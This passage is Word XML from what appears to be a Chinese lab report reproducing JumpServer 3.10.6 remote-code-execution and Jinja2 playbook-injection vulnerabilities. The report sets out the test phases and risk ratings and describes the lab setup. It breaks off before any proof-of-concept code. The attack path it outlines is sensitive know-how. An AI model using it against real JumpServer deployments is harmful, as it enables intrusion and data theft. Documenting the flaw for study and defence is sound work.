        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1852" w:tblpY="341"/>
        <w:tblOverlap w:val="never"/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768"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C60920" w14:paraId="4308CCB5" w14:textId="77777777" w:rsidTr="00884163">
        <w:trPr>
          <w:trHeight w:val="432"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1951" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1B9DC8F7" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00000000" w:rsidP="00687755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项目阶段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6768" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F336DD2" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00000000" w:rsidP="00687755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工作内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60920" w14:paraId="3A3768EC" w14:textId="77777777" w:rsidTr="00884163">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1951" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="43A2172B" w14:textId="45C5070E" w:rsidR="00C60920" w:rsidRDefault="00884163" w:rsidP="00687755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信息收集阶段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6768" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C5F972D" w14:textId="2D3BDDB0" w:rsidR="00C60920" w:rsidRDefault="00C36058" w:rsidP="00854BD6">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="276" w:lineRule="auto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在此阶段，进行信息收集工作，确定是否使用了存在该漏洞的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web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系统，并确定测试与攻击的目标。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60920" w14:paraId="37F90FC2" w14:textId="77777777" w:rsidTr="00884163">
        <w:trPr>
          <w:trHeight w:val="851"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1951" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7AC0FBD3" w14:textId="1F97E7E1" w:rsidR="00C60920" w:rsidRDefault="00884163" w:rsidP="00687755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环境搭建阶段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6768" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5889C28A" w14:textId="28DAF374" w:rsidR="00C60920" w:rsidRDefault="00C36058" w:rsidP="00854BD6">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="276" w:lineRule="auto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在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kali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中配置基于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jumpserver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的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Web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服务并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启用</w:t>
            </w:r>
            <w:r w:rsidRPr="00C36058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。包括配置指定版本的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jumpserver</w:t>
            </w:r>
            <w:r w:rsidR="00307811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(3.10.6)</w:t>
            </w:r>
            <w:r w:rsidR="00273155">
              <w:rPr>
                <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>，创建账号以及用户资产等。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60920" w14:paraId="5E05A5FB" w14:textId="77777777" w:rsidTr="00884163">
        <w:trPr>
          <w:trHeight w:val="851"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1951" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="59A4E5E0" w14:textId="76A04B7D" w:rsidR="00C60920" w:rsidRDefault="00884163" w:rsidP="00687755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漏洞利用阶段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6768" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2613BB50" w14:textId="3E402D2C" w:rsidR="00C60920" w:rsidRDefault="00664CFE" w:rsidP="00854BD6">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="276" w:lineRule="auto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写入我们的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POC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脚本，利用漏洞，并运行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playbook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，观察系统后台数据库中是否有注入。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00884163" w14:paraId="234E1ABC" w14:textId="77777777" w:rsidTr="00884163">
        <w:trPr>
          <w:trHeight w:val="851"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1951" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="19BD77AF" w14:textId="261A3E22" w:rsidR="00884163" w:rsidRDefault="00884163" w:rsidP="00687755">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center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验证漏洞阶段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6768" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14A544D3" w14:textId="7964887A" w:rsidR="00884163" w:rsidRDefault="00664CFE" w:rsidP="00854BD6">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:textAlignment w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
            </w:pP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前往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kali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中的数据库，查看是否有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pwnd</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>文件的注入。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="06646E19" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00000000" w:rsidP="00854BD6">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc29668"/>
      <w:bookmarkStart w:id="20" w:name="_Toc18669"/>
      <w:bookmarkStart w:id="21" w:name="_Toc172983147"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>风险等级</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkEnd w:id="20"/>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8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1276"/>
        <w:gridCol w:w="6555"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C60920" w14:paraId="2A5FBCD4" w14:textId="77777777" w:rsidTr="00B616BC">
        <w:trPr>
          <w:trHeight w:val="567"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="944" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="55E079B7" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00000000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号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1FAA4A02" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00000000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等级</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6555" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="62E5F11C" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00000000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险描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60920" w14:paraId="79229186" w14:textId="77777777" w:rsidTr="00B616BC">
        <w:trPr>
          <w:trHeight w:val="567"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="944" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="35DBDBF2" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00000000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4E919EF7" w14:textId="390533CF" w:rsidR="00C60920" w:rsidRDefault="000B5738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危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6555" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="438C5195" w14:textId="1866402B" w:rsidR="00C60920" w:rsidRDefault="00B616BC" w:rsidP="00854BD6">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B616BC">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>远程代码执行漏洞，具有低权限用户帐户的攻击者可通过构建恶意</w:t>
            </w:r>
            <w:r w:rsidRPr="00B616BC">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>playbook</w:t>
            </w:r>
            <w:r w:rsidRPr="00B616BC">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>模板绕过</w:t>
            </w:r>
            <w:r w:rsidRPr="00B616BC">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Ansible</w:t>
            </w:r>
            <w:r w:rsidRPr="00B616BC">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>中的输入验证机制，从而在</w:t>
            </w:r>
            <w:r w:rsidRPr="00B616BC">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Celery</w:t>
            </w:r>
            <w:r w:rsidRPr="00B616BC">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>容器中执行任意代码。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60920" w14:paraId="49C49AAC" w14:textId="77777777" w:rsidTr="00B616BC">
        <w:trPr>
          <w:trHeight w:val="567"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="944" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3E35BE10" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00000000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2EC9335F" w14:textId="17A16657" w:rsidR="00C60920" w:rsidRDefault="000B5738" w:rsidP="00854BD6">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto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高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6555" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="77C488E4" w14:textId="30A50BA6" w:rsidR="00C60920" w:rsidRDefault="00B616BC" w:rsidP="00854BD6">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B616BC">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>JINJA2</w:t>
            </w:r>
            <w:r w:rsidRPr="00B616BC">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>注入代码执行漏洞，具有低权限用户帐户的攻击者可通过构建恶意</w:t>
            </w:r>
            <w:r w:rsidRPr="00B616BC">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>playbook</w:t>
            </w:r>
            <w:r w:rsidRPr="00B616BC">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>模板利用</w:t>
            </w:r>
            <w:r w:rsidRPr="00B616BC">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Ansible</w:t>
            </w:r>
            <w:r w:rsidRPr="00B616BC">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>中的</w:t>
            </w:r>
            <w:r w:rsidRPr="00B616BC">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Jinja2</w:t>
            </w:r>
            <w:r w:rsidRPr="00B616BC">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>模板代码注入漏洞在</w:t>
            </w:r>
            <w:r w:rsidRPr="00B616BC">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Celery</w:t>
            </w:r>
            <w:r w:rsidRPr="00B616BC">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>容器中执行任意代码。由于</w:t>
            </w:r>
            <w:r w:rsidRPr="00B616BC">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Celery</w:t>
            </w:r>
            <w:r w:rsidRPr="00B616BC">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>容器以</w:t>
            </w:r>
            <w:r w:rsidRPr="00B616BC">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>root</w:t>
            </w:r>
            <w:r w:rsidRPr="00B616BC">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>权限运行并具有数据库访问权限，因此攻击者可以从所有主机窃取敏感信息或操纵数据库。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2D4EB6B0" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00C60920" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FC35B60" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00000000" w:rsidP="00854BD6">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="312" w:after="312" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc6854"/>
      <w:bookmarkStart w:id="23" w:name="_Toc28758"/>
      <w:bookmarkStart w:id="24" w:name="_Toc172983148"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞复现过程</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="67092975" w14:textId="77777777" w:rsidR="000F4DD0" w:rsidRDefault="000F4DD0" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先我们在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JumpServer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>官网下载文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>quick_start.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65885B92" w14:textId="77777777" w:rsidR="000F4DD0" w:rsidRDefault="000F4DD0" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>下载完毕后，将其拖入到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB949B0" w14:textId="3B2DE9B9" w:rsidR="00A60BD3" w:rsidRPr="00A60BD3" w:rsidRDefault="000F4DD0" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mousepad</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模式打开该文件，修改版本号为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.10.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAF3DE0" w14:textId="7E78C766" w:rsidR="00C60920" w:rsidRPr="00A60BD3" w:rsidRDefault="000B28BB" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="000B28BB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A867F46" wp14:editId="58C1115B">
            <wp:extent cx="5274310" cy="3974465"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="1082278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DE8" w14:textId="6AC3200C" w:rsidR="000B28BB" w:rsidRDefault="000B28BB" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="000B28BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们在</w:t>
      </w:r>
      <w:r w:rsidRPr="000B28BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:r w:rsidRPr="000B28BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统中输入</w:t>
      </w:r>
      <w:r w:rsidRPr="000B28BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo bash quick_start.sh </w:t>
      </w:r>
      <w:r w:rsidRPr="000B28BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行下载</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303F7D3D" w14:textId="2A4BA87C" w:rsidR="00ED454F" w:rsidRDefault="00ED454F" w:rsidP="004E06F0">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED454F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E2A2344" wp14:editId="32E1A11D">
            <wp:extent cx="4346345" cy="3500728"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="1701754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41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200" cy="350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19FE" w14:textId="77777777" w:rsidR="00B01D5F" w:rsidRPr="00B01D5F" w:rsidRDefault="00B01D5F" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00B01D5F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.10.6</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01D5F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本下载完毕后，系统会提供给我们对应的</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01D5F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01D5F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212306E7" w14:textId="7B83733E" w:rsidR="006841D9" w:rsidRDefault="006841D9" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="006841D9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A64F00C" wp14:editId="4B5ABDCE">
            <wp:extent cx="5274310" cy="3345180"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="47549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9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97111" w14:textId="77777777" w:rsidR="0046096B" w:rsidRDefault="0046096B" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以看出此处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http://192.168.188.128:80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FE2C22" w14:textId="6C9D02EF" w:rsidR="0046096B" w:rsidRDefault="0046096B" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们登陆此处的网址，就可以访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JumpServer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D39B57" w14:textId="49DFF690" w:rsidR="0040738E" w:rsidRDefault="0040738E" w:rsidP="004E06F0">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0040738E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54AC9300" wp14:editId="73EC0113">
            <wp:extent cx="4484535" cy="1924797"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8718863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886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291" cy="19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7C8F" w14:textId="36E0BE4A" w:rsidR="004266EA" w:rsidRDefault="004266EA" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="004266EA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们根据提供的账号</w:t>
      </w:r>
      <w:r w:rsidRPr="004266EA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidRPr="004266EA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，密码</w:t>
      </w:r>
      <w:r w:rsidRPr="004266EA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidRPr="004266EA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行登录，再修改密码，重新登录，进入主界面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341E710C" w14:textId="48ABABA4" w:rsidR="00534E98" w:rsidRDefault="00534E98" w:rsidP="004E06F0">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00534E98">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BC7991E" wp14:editId="2BA8865B">
            <wp:extent cx="4557980" cy="2245517"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="459681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81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4911" cy="22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32C6" w14:textId="11EED6F4" w:rsidR="000C74B9" w:rsidRDefault="000C74B9" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>接着我们向后台添加资产，添加一条名为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的资产即可，设置对应的地址为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主机地址，注意还需要添加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的账号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F63185" w14:textId="0F6AA1C5" w:rsidR="0000566F" w:rsidRDefault="0000566F" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0000566F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D8739E1" wp14:editId="1AF0CBC6">
            <wp:extent cx="5274310" cy="2611755"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1010348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486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189A" w14:textId="570CA289" w:rsidR="00D21BCF" w:rsidRDefault="00D21BCF" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00D21BCF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们对其进行测试，发现连接成功！</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23646634" w14:textId="5CD26512" w:rsidR="00B8113A" w:rsidRDefault="00B8113A" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00B8113A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37DBA625" wp14:editId="1897B4D2">
            <wp:extent cx="5274310" cy="2623820"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="578770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70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45E5" w14:textId="32E437B2" w:rsidR="004F44F4" w:rsidRDefault="004F44F4" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="004F44F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后我们添加用户</w:t>
      </w:r>
      <w:r w:rsidRPr="004F44F4">
        <w:rPr>
